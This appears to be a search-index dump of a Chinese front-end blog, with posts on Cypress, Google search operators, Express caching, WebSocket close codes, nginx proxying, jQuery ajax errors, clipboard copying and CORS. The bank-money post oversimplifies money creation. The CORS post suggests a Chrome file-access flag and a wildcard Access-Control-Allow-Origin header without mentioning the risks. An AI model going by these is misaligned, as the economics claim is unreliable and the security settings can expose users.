Debug方便:出错了可以很方便的调试,而不是去猜 3. 为什么要用Cypress? Cypress基本上拥有了上面的特点之外,还有以下特点。\n时光穿梭 测试运行时,Cypress会自动截图,你可以轻易的查看每个时间的截图 Debug友好 不需要再去猜测为什么测试有失败了,Cypress提供Chrome DevTools, 所以Debug是非常方便的。 实时刷新 Cypress检测测试用例改变后,会自动刷新 自动等待 不需要在使用wait类似的方法等待某个DOM出现,Cypress会自动帮你做这些 Spies, stubs, and clocks Verify and control the behavior of functions, server responses, or timers.","title":"端到端测试哪家强?不容错过的Cypress"},{"content":" 1. 谷歌搜索指令 2. 基本命令 3. 
关键词使用 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 | 包含A且必须包含B | A +B | A和+之间有空格 | Maxwell +wills | 包含A且不包含B | A -B | A和+之间有空格 | Maxwell -Absolom \u0026quot; \u0026quot; | 完整匹配AB | \u0026ldquo;AB\u0026rdquo; | | \u0026ldquo;Thomas Jefferson\u0026rdquo; OR | 包含A或者B | A OR B 或者 A | B | | nodejs OR webpack +-\u0026ldquo;OR | 指令可以组合,完成更复杂的查询 | | | beach -sandy +albert +nathaniel ~ | 包含A, 并且包含B的近义词 | A ~B | | github ~js .. | 区间查询 AB之间 | A..B | | china 1888..2000 | 匹配任意字符 | | | node* java site: | 站内搜索 | A site:B | | | DLL site:webpack.js.org filetype: | 按照文件类型搜索 | A filetype:B | | csta filetype:pdf 3. 关键词使用 方法 说明 示例 列举关键词 列举所有和搜索相关的关键词,并且尽量把重要的关键词排在前面。不同的关键词顺序会导致不同的返回不同的结果 书法 毛笔 绘画 不要使用某些词 如代词介词语气词,如i, the, of, it, 我,吗 搜索引擎一般会直接忽略这些信息含量少的词 大小写不敏感 大写字符和小写字符在搜索引擎看没有区别,尽量使用小写的就可以 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 Advanced Google Search Commands Google_rules_for_searching.pdf An introduction to search commands ","permalink":"https://wdd.js.org/posts/2018/04/master-google-search-command/","summary":"1. 谷歌搜索指令 2. 基本命令 3. 关键词使用 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 | 包含A且必须包含B | A +B | A和+之间有空格 | Maxwell +wills | 包含A且不包含B | A -B | A和+之间有空格 | Maxwell -Absolom \u0026quot; \u0026quot; | 完整匹配AB | \u0026ldquo;AB\u0026rdquo; | | \u0026ldquo;Thomas Jefferson\u0026rdquo; OR | 包含A或者B | A OR B 或者 A | B | | nodejs OR webpack +-\u0026ldquo;OR | 指令可以组合,完成更复杂的查询 | | | beach -sandy +albert +nathaniel ~ | 包含A, 并且包含B的近义词 | A ~B | | github ~js .","title":"掌握谷歌搜索高级指令"},{"content":"1. 角色划分 名称 角色 账户 A 银行家 0 B 建筑商 100万 C 商人 0 2. 建筑商向银行存储100万 名称 角色 账户 A 银行家 100万 现金 B 建筑商 100万 支票 C 商人 0 2. 商人向银行贷款100万 此时银行的账户存款已经是0了,但是B还在银行存了100万。那银行究竟是还有100万呢, 还是一毛都没有了呢。\n此时建筑商如果要取现金,那么银行马上就要破产。\n名称 角色 账户 A 银行家 100现金 B 建筑商 100万 支票 C 商人 100万 支票 3. 
商人需要建筑商来建造房子 商人需要建筑商来建筑房子,费用是100万,付给建筑商,建筑商又把100支票存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 200万 支票 C 商人 0 商人又从银行借钱100万,来付给建筑商建房子,建筑商把钱存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 300万 支票 C 商人 0 只要这个循环还在继续,你会发现,建筑商的账面上的支票越来越多,但是银行始终都是100万现金存在那里,从来都没动过。\n💰就这样魔术般的产生, 如果银行那一天缺钱了,银行就拿一张纸出来,上面写着1000万。看!银行造钱就是那么容易。\n","permalink":"https://wdd.js.org/posts/2018/04/the-secret-of-bank-create-money/","summary":"1. 角色划分 名称 角色 账户 A 银行家 0 B 建筑商 100万 C 商人 0 2. 建筑商向银行存储100万 名称 角色 账户 A 银行家 100万 现金 B 建筑商 100万 支票 C 商人 0 2. 商人向银行贷款100万 此时银行的账户存款已经是0了,但是B还在银行存了100万。那银行究竟是还有100万呢, 还是一毛都没有了呢。\n此时建筑商如果要取现金,那么银行马上就要破产。\n名称 角色 账户 A 银行家 100现金 B 建筑商 100万 支票 C 商人 100万 支票 3. 商人需要建筑商来建造房子 商人需要建筑商来建筑房子,费用是100万,付给建筑商,建筑商又把100支票存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 200万 支票 C 商人 0 商人又从银行借钱100万,来付给建筑商建房子,建筑商把钱存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 300万 支票 C 商人 0 只要这个循环还在继续,你会发现,建筑商的账面上的支票越来越多,但是银行始终都是100万现金存在那里,从来都没动过。","title":"金钱游戏 - 银行造钱的秘密"},{"content":"1. Express设置缓存 Express设置静态文件的方法很简单,一行代码搞定。app.use(express.static(path.join(__dirname, 'public'), {maxAge: MAX_AGE})), 注意MAX_AGE的单位是毫秒。这句代码的含义是让pulic目录下的所有文件都可以在浏览器中缓存,过期时长为MAX_AGE毫秒。\napp.use(express.static(path.join(__dirname, \u0026#39;public\u0026#39;), {maxAge: config.get(\u0026#39;maxAge\u0026#39;)})) 2. Express让浏览器清除缓存 缓存的好处是可以更快的访问服务,但是缓存也有坏处。例如设置缓存为10天,第二天的时候服务更新了。如果客户端不强制刷新页面的话,浏览器会一致使用更新前的静态文件,这样会导致一些BUG。你总当每次出问题时,客户打电话给你后,你让他强制刷新浏览器吧?\n所以,最好在服务重启后,重新让浏览器获取最新的静态文件。\n设置的方式是给每一个静态文件设置一个时间戳。\n例如:vendor/loadjs/load.js?_=123898923423\u0026quot;\u0026gt;\u0026lt;/script\u0026gt;\n2.1. Express 路由 // /routes/index.js router.get(\u0026#39;/home\u0026#39;, function (req, res, next) { res.render(\u0026#39;home\u0026#39;, {config: config, serverStartTimestamp: new Date().getTime()}) }) 2.2. 视图文件 // views/home.html \u0026lt;script src=\u0026#34;vendor/loadjs/load.js?_=\u0026lt;%= serverStartTimestamp %\u0026gt;\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; 设置之后,每次服务更新或者重启,浏览器都会使用最新的时间戳serverStartTimestamp,去获取静态文件。\n2.3. 
动态加载JS文件 有时候js文件并不是直接在HTML中引入,可能是使用了一些js文件加载库,例如requirejs, LABjs等。这些情况下,可以在全局设置环境变量SERVER_START_TIMESTAMP,用来表示服务启动的时间戳,在获取js的时候,将该时间戳拼接在路径上。\n注意:环境变量SERVER_START_TIMESTAMP,一定要在其他脚本使用前定义。\n// views/home.html \u0026lt;script\u0026gt; var SERVER_START_TIMESTAMP = \u0026lt;%= serverStartTimestamp %\u0026gt; \u0026lt;/script\u0026gt; // load.js \u0026#39;vendor/contact-center/skill.js?_=\u0026#39; + SERVER_START_TIMESTAMP ","permalink":"https://wdd.js.org/posts/2018/04/express-static-file-cache-setting-and-cleaning/","summary":"1. Express设置缓存 Express设置静态文件的方法很简单,一行代码搞定。app.use(express.static(path.join(__dirname, 'public'), {maxAge: MAX_AGE})), 注意MAX_AGE的单位是毫秒。这句代码的含义是让pulic目录下的所有文件都可以在浏览器中缓存,过期时长为MAX_AGE毫秒。\napp.use(express.static(path.join(__dirname, \u0026#39;public\u0026#39;), {maxAge: config.get(\u0026#39;maxAge\u0026#39;)})) 2. Express让浏览器清除缓存 缓存的好处是可以更快的访问服务,但是缓存也有坏处。例如设置缓存为10天,第二天的时候服务更新了。如果客户端不强制刷新页面的话,浏览器会一致使用更新前的静态文件,这样会导致一些BUG。你总当每次出问题时,客户打电话给你后,你让他强制刷新浏览器吧?\n所以,最好在服务重启后,重新让浏览器获取最新的静态文件。\n设置的方式是给每一个静态文件设置一个时间戳。\n例如:vendor/loadjs/load.js?_=123898923423\u0026quot;\u0026gt;\u0026lt;/script\u0026gt;\n2.1. Express 路由 // /routes/index.js router.get(\u0026#39;/home\u0026#39;, function (req, res, next) { res.render(\u0026#39;home\u0026#39;, {config: config, serverStartTimestamp: new Date().getTime()}) }) 2.2. 视图文件 // views/home.html \u0026lt;script src=\u0026#34;vendor/loadjs/load.js?_=\u0026lt;%= serverStartTimestamp %\u0026gt;\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; 设置之后,每次服务更新或者重启,浏览器都会使用最新的时间戳serverStartTimestamp,去获取静态文件。\n2.3. 
动态加载JS文件 有时候js文件并不是直接在HTML中引入,可能是使用了一些js文件加载库,例如requirejs, LABjs等。这些情况下,可以在全局设置环境变量SERVER_START_TIMESTAMP,用来表示服务启动的时间戳,在获取js的时候,将该时间戳拼接在路径上。\n注意:环境变量SERVER_START_TIMESTAMP,一定要在其他脚本使用前定义。\n// views/home.html \u0026lt;script\u0026gt; var SERVER_START_TIMESTAMP = \u0026lt;%= serverStartTimestamp %\u0026gt; \u0026lt;/script\u0026gt; // load.js \u0026#39;vendor/contact-center/skill.js?_=\u0026#39; + SERVER_START_TIMESTAMP ","title":"Express静态文件浏览器缓存设置与缓存清除"},{"content":"1. 把错误打印出来 WebSocket断开的原因有很多,最好在WebSocket断开时,将错误打印出来。\n在线demo地址:https://wdd.js.org/websocket-demos/\nws.onerror = function (e) { console.log(\u0026#39;WebSocket发生错误: \u0026#39; + e.code) console.log(e) } 如果你想自己玩玩WebSocket, 但是你又不想自己部署一个WebSocket服务器,你可以使用ws = new WebSocket('wss://echo.websocket.org/'), 你向echo.websocket.org发送消息,它会回复你同样的消息。\n2. 重要信息错误状态码 WebSocket断开时,会触发CloseEvent, CloseEvent会在连接关闭时发送给使用 WebSockets 的客户端. 它在 WebSocket 对象的 onclose 事件监听器中使用。CloseEvent的code字段表示了WebSocket断开的原因。可以从该字段中分析断开的原因。\n3. 关闭状态码表 一般来说1006的错误码出现的情况比较常见,该错误码一般出现在断网时。\n状态码 名称 描述 0–999 保留段, 未使用. 1000 CLOSE_NORMAL 正常关闭; 无论为何目的而创建, 该链接都已成功完成任务. 1001 CLOSE_GOING_AWAY 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 1002 CLOSE_PROTOCOL_ERROR 由于协议错误而中断连接. 1003 CLOSE_UNSUPPORTED 由于接收到不允许的数据类型而断开连接 (如仅接收文本数据的终端接收到了二进制数据). 1004 保留. 其意义可能会在未来定义. 1005 CLOSE_NO_STATUS 保留. 表示没有收到预期的状态码. 1006 CLOSE_ABNORMAL 保留. 用于期望收到状态码时连接非正常关闭 (也就是说, 没有发送关闭帧). 1007 Unsupported Data 由于收到了格式不符的数据而断开连接 (如文本消息中包含了非 UTF-8 数据). 1008 Policy Violation 由于收到不符合约定的数据而断开连接. 这是一个通用状态码, 用于不适合使用 1003 和 1009 状态码的场景. 1009 CLOSE_TOO_LARGE 由于收到过大的数据帧而断开连接. 1010 Missing Extension 客户端期望服务器商定一个或多个拓展, 但服务器没有处理, 因此客户端断开连接. 1011 Internal Error 客户端由于遇到没有预料的情况阻止其完成请求, 因此服务端断开连接. 1012 Service Restart 服务器由于重启而断开连接. 1013 Try Again Later 服务器由于临时原因断开连接, 如服务器过载因此断开一部分客户端连接. 1014 由 WebSocket标准保留以便未来使用. 1015 TLS Handshake 保留. 表示连接由于无法完成 TLS 握手而关闭 (例如无法验证服务器证书). 1016–1999 由 WebSocket标准保留以便未来使用. 2000–2999 由 WebSocket拓展保留使用. 3000–3999 可以由库或框架使用.? 不应由应用使用. 可以在 IANA 注册, 先到先得. 4000–4999 可以由应用使用. 4. 
其他注意事项 如果你的服务所在的域是HTTPS的,那么使用的WebSocket协议也必须是wss, 而不能是ws\n5. 如何在老IE上使用原生WebSocket? web-socket-js是基于flash的技术,只需要引入两个js文件和一个swf文件,就可以让浏览器用于几乎原生的WebSocket接口。另外,web-socket-js还是需要在ws服务端843端口做一个flash安全策略文件的服务。\n我自己曾经基于stompjs和web-socket-js,做WebSocket兼容到IE5, 当然了stompjs在低版本的IE上有兼容性问题, 而且stompjs已经不再维护了,你可以使用我fork的一个版本,地址是:https://github.com/wangduanduan/stomp-websocket/blob/master/lib/stomp.js\n主要是老版本IE在正则表达式行为方面有点异常。\n// fix ie8, ie9, RegExp not normal problem // in chrome the frames length will be 2, but in ie8, ie9, it well be 1 // by wdd 20180321 if (frames.length === 1) { frames.push(\u0026#39;\u0026#39;) } 6. 参考 CloseEvent getting the reason why websockets closed with close code 1006 Defined Status Codes ","permalink":"https://wdd.js.org/posts/2018/03/websocket-close-reasons/","summary":"1. 把错误打印出来 WebSocket断开的原因有很多,最好在WebSocket断开时,将错误打印出来。\n在线demo地址:https://wdd.js.org/websocket-demos/\nws.onerror = function (e) { console.log(\u0026#39;WebSocket发生错误: \u0026#39; + e.code) console.log(e) } 如果你想自己玩玩WebSocket, 但是你又不想自己部署一个WebSocket服务器,你可以使用ws = new WebSocket('wss://echo.websocket.org/'), 你向echo.websocket.org发送消息,它会回复你同样的消息。\n2. 重要信息错误状态码 WebSocket断开时,会触发CloseEvent, CloseEvent会在连接关闭时发送给使用 WebSockets 的客户端. 它在 WebSocket 对象的 onclose 事件监听器中使用。CloseEvent的code字段表示了WebSocket断开的原因。可以从该字段中分析断开的原因。\n3. 关闭状态码表 一般来说1006的错误码出现的情况比较常见,该错误码一般出现在断网时。\n状态码 名称 描述 0–999 保留段, 未使用. 1000 CLOSE_NORMAL 正常关闭; 无论为何目的而创建, 该链接都已成功完成任务. 1001 CLOSE_GOING_AWAY 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 1002 CLOSE_PROTOCOL_ERROR 由于协议错误而中断连接. 1003 CLOSE_UNSUPPORTED 由于接收到不允许的数据类型而断开连接 (如仅接收文本数据的终端接收到了二进制数据). 1004 保留. 其意义可能会在未来定义. 1005 CLOSE_NO_STATUS 保留. 表示没有收到预期的状态码. 1006 CLOSE_ABNORMAL 保留. 
用于期望收到状态码时连接非正常关闭 (也就是说, 没有发送关闭帧).","title":"WebSocket断开原因分析"},{"content":"无论什么语言,都需要逻辑,而逻辑中,能否判断出真假,是最基本也是最重要技能之一。\nJS中的假值有6个 false '' undefined null 0, +0, -0 NaN 有点类似假值的真值有两个 {} [] 空对象和空数组,很多初学者都容易把这两个当做假值。但是实际上它们是真值,你只需要记住,除了null之外的所有对象类型的数据,都是真值。\ntypeof null // \u0026#39;object\u0026#39; 据说:typeof null返回对象这是一个js语言中的bug。实际上typeof null应该返回null才比较准确,但是这个bug已经存在好久了。几乎所有的代码里都这样去判断。如果把typeof null给改成返回null, 那么这必定会导致JS世界末日。\n我们承认JS并不完美,她有很多小缺点,但是这并不妨碍她吸引万千开发者拜倒在她的石榴裙下。\n就像一首歌唱的:有些人说不清哪里好 但就是谁都替代不了\n","permalink":"https://wdd.js.org/posts/2018/03/js-true-and-false-value/","summary":"无论什么语言,都需要逻辑,而逻辑中,能否判断出真假,是最基本也是最重要技能之一。\nJS中的假值有6个 false '' undefined null 0, +0, -0 NaN 有点类似假值的真值有两个 {} [] 空对象和空数组,很多初学者都容易把这两个当做假值。但是实际上它们是真值,你只需要记住,除了null之外的所有对象类型的数据,都是真值。\ntypeof null // \u0026#39;object\u0026#39; 据说:typeof null返回对象这是一个js语言中的bug。实际上typeof null应该返回null才比较准确,但是这个bug已经存在好久了。几乎所有的代码里都这样去判断。如果把typeof null给改成返回null, 那么这必定会导致JS世界末日。\n我们承认JS并不完美,她有很多小缺点,但是这并不妨碍她吸引万千开发者拜倒在她的石榴裙下。\n就像一首歌唱的:有些人说不清哪里好 但就是谁都替代不了","title":"js中的真值和假值"},{"content":"1. 
AWS EC2 不支持WebSocket 直达解决方案 英文版\n简单说一下思路:WebSocket底层基于TCP协议的,如果你的服务器基于HTTP协议暴露80端口,那WebSocket肯定无法连接。你只要将HTTP协议修改成TCP协议就可以了。\n然后是安全组的配置:\n同样如果使用了NGINX作为反向代理,那么NGINX也需要做配置的。\n// https://gist.githubusercontent.com/unshift/324be6a8dc9e880d4d670de0dc97a8ce/raw/29507ed6b3c9394ecd7842f9d3228827cffd1c58/elasticbeanstalk_websockets files: \u0026#34;/etc/nginx/conf.d/01_websockets.conf\u0026#34; : mode: \u0026#34;000644\u0026#34; owner: root group: root content : | upstream nodejs { server 127.0.0.1:8081; keepalive 256; } server { listen 8080; location / { proxy_pass http://nodejs; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } \u0026#34;/opt/elasticbeanstalk/hooks/appdeploy/enact/41_remove_eb_nginx_confg.sh\u0026#34;: mode: \u0026#34;000755\u0026#34; owner: root group: root content : | mv /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf.old 2. NGINX做反向代理是需要注意的问题 如果排除所有问题后,那剩下的问题可以考虑出在反向代理上,一下有几点是可以考虑的。\nHTTP的版本问题: http有三个版本,http 1.0, 1.1, 2.0, 现在主流的浏览器都是使用http 1.1版本,为了保证更好的兼容性,最好转发时不要修改协议的版本号\nNGINX具有路径重写功能,如果你使用了该功能,就要考虑问题可能出在这里,因为NGINX在路径重写时,需要对路径进行编解码,有可能在解码之后,没有编码就发送给后端的服务器,导致后端服务器无法对URL进行解码。\n3. IE8 IE9 有没有简单方便支持WebSocket的方案 目前测试下来,最简单方案是基于flash的。参考:https://github.com/gimite/web-socket-js,\n注意该方案需要在WebSocket服务上的843端口, 提供socket_policy_files, 也可以参考:A PolyFill for WebSockets\n网上也有教程是使用socket.io基于ajax长轮训的方案,如果服务端已经确定的情况下,一般是不会轻易改动服务端代码的。而且ajax长轮训也是有延迟,和disconnect时,无法回调的问题。\n4. stompjs connected后,没有调用connect_callBack 该问题主要是使用web-socket-js,在ie8,ie9上出现的\n该问题还没有分析出原因,但是看了stompjs的源码不是太多,明天用源码调试看看原因。\n问题已经找到,请参考:https://github.com/wangduanduan/stomp-websocket#about-ie8-ie9-use-websocket\n5. 
参考文献 STOMP Over WebSocket STOMP Protocol Specification, Version 1.1 Stomp Over Websocket文档, ","permalink":"https://wdd.js.org/posts/2018/03/stomp-over-websocket/","summary":"1. AWS EC2 不支持WebSocket 直达解决方案 英文版\n简单说一下思路:WebSocket底层基于TCP协议的,如果你的服务器基于HTTP协议暴露80端口,那WebSocket肯定无法连接。你只要将HTTP协议修改成TCP协议就可以了。\n然后是安全组的配置:\n同样如果使用了NGINX作为反向代理,那么NGINX也需要做配置的。\n// https://gist.githubusercontent.com/unshift/324be6a8dc9e880d4d670de0dc97a8ce/raw/29507ed6b3c9394ecd7842f9d3228827cffd1c58/elasticbeanstalk_websockets files: \u0026#34;/etc/nginx/conf.d/01_websockets.conf\u0026#34; : mode: \u0026#34;000644\u0026#34; owner: root group: root content : | upstream nodejs { server 127.0.0.1:8081; keepalive 256; } server { listen 8080; location / { proxy_pass http://nodejs; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } \u0026#34;/opt/elasticbeanstalk/hooks/appdeploy/enact/41_remove_eb_nginx_confg.sh\u0026#34;: mode: \u0026#34;000755\u0026#34; owner: root group: root content : | mv /etc/nginx/conf.","title":"在实践中我遇到stompjs, websocket和nginx的问题与总结"},{"content":"1. 问题现象 HTTP 状态码为 200 OK 时, jquery ajax报错\n2. 问题原因 jquery ajax的dataType字段包含:json, 但是服务端返回的数据不是规范的json格式,导致jquery解析json字符串报错,最终导致ajax报错。\njQuery ajax 官方文档上说明:\n\u0026ldquo;json\u0026rdquo;: Evaluates the response as JSON and returns a JavaScript object. Cross-domain \u0026ldquo;json\u0026rdquo; requests are converted to \u0026ldquo;jsonp\u0026rdquo; unless the request includes jsonp: false in its request options. The JSON data is parsed in a strict manner; any malformed JSON is rejected and a parse error is thrown. As of jQuery 1.9, an empty response is also rejected; the server should return a response of null or {} instead. 
(See json.org for more information on proper JSON formatting.)\n设置dataType为json时,jquery就会去解析响应体为JavaScript对象。跨域的json请求会被转化成jsonp, 除非设置了jsonp: false。JSON数据会以严格模式去解析,任何不规范的JSON字符串都会解析异常并抛出错误。从jQuery 1.9起,一个空的响应也会被抛出异常。服务端应该返回一个null或者{}去代替空响应。参考json.org, 查看更多内容\n3. 解决方案 这个问题的原因是后端返回的数据格式不规范,所以后端在返回结果是,不要使用空的响应,也不应该去手动拼接JSON字符串,而应该交给响应的库来实现JSON序列化字符串工作。\n方案1: 如果后端确定响应体中不返回数据,那么就把状态码设置为204,而不是200。我一直逼着后端同事这么做。 方案2:如果后端接口想返回200,那么请返回一个null或者{}去代替空响应 方案3:别用jQuery的ajax,换个其他的库试试 4. 参考 Ajax request returns 200 OK, but an error event is fired instead of success jQuery.ajax ","permalink":"https://wdd.js.org/posts/2018/03/status-code-200-jquery-ajax-failed/","summary":"1. 问题现象 HTTP 状态码为 200 OK 时, jquery ajax报错\n2. 问题原因 jquery ajax的dataType字段包含:json, 但是服务端返回的数据不是规范的json格式,导致jquery解析json字符串报错,最终导致ajax报错。\njQuery ajax 官方文档上说明:\n\u0026ldquo;json\u0026rdquo;: Evaluates the response as JSON and returns a JavaScript object. Cross-domain \u0026ldquo;json\u0026rdquo; requests are converted to \u0026ldquo;jsonp\u0026rdquo; unless the request includes jsonp: false in its request options. The JSON data is parsed in a strict manner; any malformed JSON is rejected and a parse error is thrown. As of jQuery 1.9, an empty response is also rejected; the server should return a response of null or {} instead.","title":"状态码为200时 jQuery ajax报错"},{"content":"1. 兼容情况 如果想浏览器支持粘贴功能,那么浏览器必须支持,document.execCommand(\u0026lsquo;copy\u0026rsquo;)方法,也可以根据document.queryCommandEnabled(\u0026lsquo;copy\u0026rsquo;),返回的true或者false判断浏览器是否支持copy命令。\n从下表可以看出,主流的浏览器都支持execCommand命令\n2. 复制的原理 查询元素 选中元素 执行复制命令 3. 代码展示 // html \u0026lt;input id=\u0026#34;username\u0026#34; value=\u0026#34;123456\u0026#34;\u0026gt; // 查询元素 var username = document.getElementById(‘username’) // 选中元素 username.select() // 执行复制 document.execCommand(\u0026#39;copy\u0026#39;) 注意: 以上代码只是简单示意,在实践过程中还有几个要判断的情况\n首要要去检测浏览器execCommand能力检测 选取元素时,有可能选取元素为空,要考虑这种情况的处理 4. 
第三方方案 clipboard.js是一个比较方便的剪贴板库,功能蛮多的。\n\u0026lt;!-- Target --\u0026gt; \u0026lt;textarea id=\u0026#34;bar\u0026#34;\u0026gt;Mussum ipsum cacilds...\u0026lt;/textarea\u0026gt; \u0026lt;!-- Trigger --\u0026gt; \u0026lt;button class=\u0026#34;btn\u0026#34; data-clipboard-action=\u0026#34;cut\u0026#34; data-clipboard-target=\u0026#34;#bar\u0026#34;\u0026gt; Cut to clipboard \u0026lt;/button\u0026gt; 官方给的代码里有上面的一个示例,如果你用了这个示例,但是不起作用,那你估计是没有初始化ClipboardJS示例的。\n注意:下面的函数必须要主动调用,这样才能给响应的DOM元素注册事件。 ClipboardJS源代码压缩后大约有3kb,虽然很小了,但是如果你不需要它的这么多功能的话,其实你自己写几行代码就可以搞定复制功能。\nnew ClipboardJS(\u0026#39;.btn\u0026#39;); ","permalink":"https://wdd.js.org/posts/2018/03/clipboard-copy-tutorial/","summary":"1. 兼容情况 如果想浏览器支持粘贴功能,那么浏览器必须支持,document.execCommand(\u0026lsquo;copy\u0026rsquo;)方法,也可以根据document.queryCommandEnabled(\u0026lsquo;copy\u0026rsquo;),返回的true或者false判断浏览器是否支持copy命令。\n从下表可以看出,主流的浏览器都支持execCommand命令\n2. 复制的原理 查询元素 选中元素 执行复制命令 3. 代码展示 // html \u0026lt;input id=\u0026#34;username\u0026#34; value=\u0026#34;123456\u0026#34;\u0026gt; // 查询元素 var username = document.getElementById(‘username’) // 选中元素 username.select() // 执行复制 document.execCommand(\u0026#39;copy\u0026#39;) 注意: 以上代码只是简单示意,在实践过程中还有几个要判断的情况\n首要要去检测浏览器execCommand能力检测 选取元素时,有可能选取元素为空,要考虑这种情况的处理 4. 第三方方案 clipboard.js是一个比较方便的剪贴板库,功能蛮多的。\n\u0026lt;!-- Target --\u0026gt; \u0026lt;textarea id=\u0026#34;bar\u0026#34;\u0026gt;Mussum ipsum cacilds...\u0026lt;/textarea\u0026gt; \u0026lt;!-- Trigger --\u0026gt; \u0026lt;button class=\u0026#34;btn\u0026#34; data-clipboard-action=\u0026#34;cut\u0026#34; data-clipboard-target=\u0026#34;#bar\u0026#34;\u0026gt; Cut to clipboard \u0026lt;/button\u0026gt; 官方给的代码里有上面的一个示例,如果你用了这个示例,但是不起作用,那你估计是没有初始化ClipboardJS示例的。\n注意:下面的函数必须要主动调用,这样才能给响应的DOM元素注册事件。 ClipboardJS源代码压缩后大约有3kb,虽然很小了,但是如果你不需要它的这么多功能的话,其实你自己写几行代码就可以搞定复制功能。\nnew ClipboardJS(\u0026#39;.btn\u0026#39;); ","title":"前端剪贴板复制功能实现原理"},{"content":"1. 
问题表现 以file:///xxx.html打开某个html文件,发送ajax请求时报错:\nResponse to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header has a value \u0026#39;null\u0026#39; that is not equal to the supplied origin. Origin \u0026#39;null\u0026#39; is therefore not allowed access. 2. 问题原因 Origin null是本地文件系统,因此这表明您正在加载通过file:// URL进行加载调用的HTML页面(例如,只需在本地文件浏览器或类似文件中双击它)。不同的浏览器采用不同的方法将相同来源策略应用到本地文件。Chrome要求比较严格,不允许这种形式的跨域请求。最好使用http:// 访问html.\n3. 解决方案 以下给出三个解决方案,第一个最快,第三个最彻底。\n3.1. 方案1 给Chrome快捷方式中增加 \u0026ndash;allow-file-access-from-files 打开Chrome快捷方式的属性中设置:右击Chrome浏览器快捷方式,选择“属性”,在“目标”中加\u0026quot;\u0026ndash;allow-file-access-from-files\u0026quot;,注意前面有个空格,重启Chrome浏览器便可。\n3.2. 方案2 启动一个简单的静态文件服务器, 以http协议访问html 参见我的这篇文章: 一行命令搭建简易静态文件http服务器\n3.3. 方案3 服务端响应修改Access-Control-Allow-Origin : * response.addHeader(\u0026#34;Access-Control-Allow-Origin\u0026#34;,\u0026#34;*\u0026#34;) 4. 参考文章 如何解决XMLHttpRequest cannot load file~~~~~~~Origin \u0026rsquo;null\u0026rsquo; is therefore not allowed access 让chrome支持本地Ajax请求,Ajax请求status cancel Origin null is not allowed by Access-Control-Allow-Origin Origin null is not allowed by Access-Control-Allow-Origin ","permalink":"https://wdd.js.org/posts/2018/03/origin-null-is-not-allowed/","summary":"1. 问题表现 以file:///xxx.html打开某个html文件,发送ajax请求时报错:\nResponse to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header has a value \u0026#39;null\u0026#39; that is not equal to the supplied origin. Origin \u0026#39;null\u0026#39; is therefore not allowed access. 2. 问题原因 Origin null是本地文件系统,因此这表明您正在加载通过file:// URL进行加载调用的HTML页面(例如,只需在本地文件浏览器或类似文件中双击它)。不同的浏览器采用不同的方法将相同来源策略应用到本地文件。Chrome要求比较严格,不允许这种形式的跨域请求。最好使用http:// 访问html.\n3. 解决方案 以下给出三个解决方案,第一个最快,第三个最彻底。\n3.1. 
方案1 给Chrome快捷方式中增加 \u0026ndash;allow-file-access-from-files 打开Chrome快捷方式的属性中设置:右击Chrome浏览器快捷方式,选择“属性”,在“目标”中加\u0026quot;\u0026ndash;allow-file-access-from-files\u0026quot;,注意前面有个空格,重启Chrome浏览器便可。\n3.2. 方案2 启动一个简单的静态文件服务器, 以http协议访问html 参见我的这篇文章: 一行命令搭建简易静态文件http服务器\n3.3. 方案3 服务端响应修改Access-Control-Allow-Origin : * response.addHeader(\u0026#34;Access-Control-Allow-Origin\u0026#34;,\u0026#34;*\u0026#34;) 4. 参考文章 如何解决XMLHttpRequest cannot load file~~~~~~~Origin \u0026rsquo;null\u0026rsquo; is therefore not allowed access 让chrome支持本地Ajax请求,Ajax请求status cancel Origin null is not allowed by Access-Control-Allow-Origin Origin null is not allowed by Access-Control-Allow-Origin ","title":"Chrome本地跨域origin-null-is-not-allowed问题分析与解决方案"},{"content":"1. 功能最强:regex101 优点:\n支持多种语言, prec,php,javascript,python,golang 界面美观大方 支持错误提示,实时匹配 缺点:\n有时候加载速度太慢 2. 可视化正则绘图: Regulex 优点:\n实时根据正则表达式绘图 页面加载速度快 3. 可视化正则绘图:regexper 优点:\n根据正则表达式绘图 页面加载速度快 缺点:\n无法实时绘图,需要点击才可以 4. 专注于python正则:pyregex 专注python 页面加载速度快 ","permalink":"https://wdd.js.org/posts/2018/02/regex-online-tools/","summary":"1. 功能最强:regex101 优点:\n支持多种语言, prec,php,javascript,python,golang 界面美观大方 支持错误提示,实时匹配 缺点:\n有时候加载速度太慢 2. 可视化正则绘图: Regulex 优点:\n实时根据正则表达式绘图 页面加载速度快 3. 可视化正则绘图:regexper 优点:\n根据正则表达式绘图 页面加载速度快 缺点:\n无法实时绘图,需要点击才可以 4. 专注于python正则:pyregex 专注python 页面加载速度快 ","title":"正则表达式在线工具集合"},{"content":"1. 问答题 1.1. HTML相关 1.1.1. 的作用是什么? 